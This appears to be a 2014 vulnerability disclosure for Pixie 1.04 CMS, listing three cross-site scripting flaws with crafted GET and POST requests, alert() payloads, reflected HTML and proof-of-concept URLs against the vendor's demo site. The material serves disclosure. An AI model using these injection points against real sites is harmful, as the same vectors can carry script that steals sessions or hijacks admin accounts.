#Title: Pixie 1.04 CMS - Multiple XSS #Version: 1.04 (Latest ATM) #Vendor: getpixie.co.uk #Demo: demo.getpixie.co.uk #Date: 01.26.2014 #Contact: smash[at]devilteam.pl 1. Cross Site Scripting - GET 'm' parameter Request: host/?s=login&m=forgotten" onload=alert(666) bad=" Injection point: <body class="pixie y2014 m1 d26 h12 s_login m_forgotten\" onload=alert(666) bad=\""> PoC: demo.getpixie.co.uk/admin/?s=login&m=forgotten" onload=alert(666) bad=" 2. Cross Site Scripting - POST message Request: POST /admin/admin/modules/ajax_message.php HTTP/1.1 Host: demo.getpixie.co.uk message=<script>alert(666)</script> Response: HTTP/1.1 200 OK Date: Sun, 26 Jan 2014 12:08:09 GMT Server: Apache X-Powered-By: PHP/5.3.28 Cache-Control: max-age=1 Expires: Sun, 26 Jan 2014 12:08:10 GMT Content-Length: 264 Keep-Alive: timeout=2 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 <span class="message_text_error"><img src="admin/theme/images/icons/error.png" /><script>alert(666)</script></span><span class="message_back"> (<a href="javascript:history.go(-1);" title="Back (Will reload any submitted form data)">go back &raquo;</a>)</span> 3. Cross Site Scripting - GET 'x' parameter Request: host/admin/index.php?s=publish&m=static&x=page-1" onload=alert(666) bad="&edit=78 Injection point: <body class="pixie y2014 m1 d26 h12 s_login m_static x_page-1\" onload=alert(666) bad=\""> (...) <script type="text/javascript" src="jscript/pixie.js.php?s=login&amp;x=page-1\" onload=alert(666) bad=\"&amp;advmode=Toggle advanced Mode"></script> PoC: demo.getpixie.co.uk/admin/index.php?s=publish&m=static&x=page-1" onload=alert(666) bad="&edit=78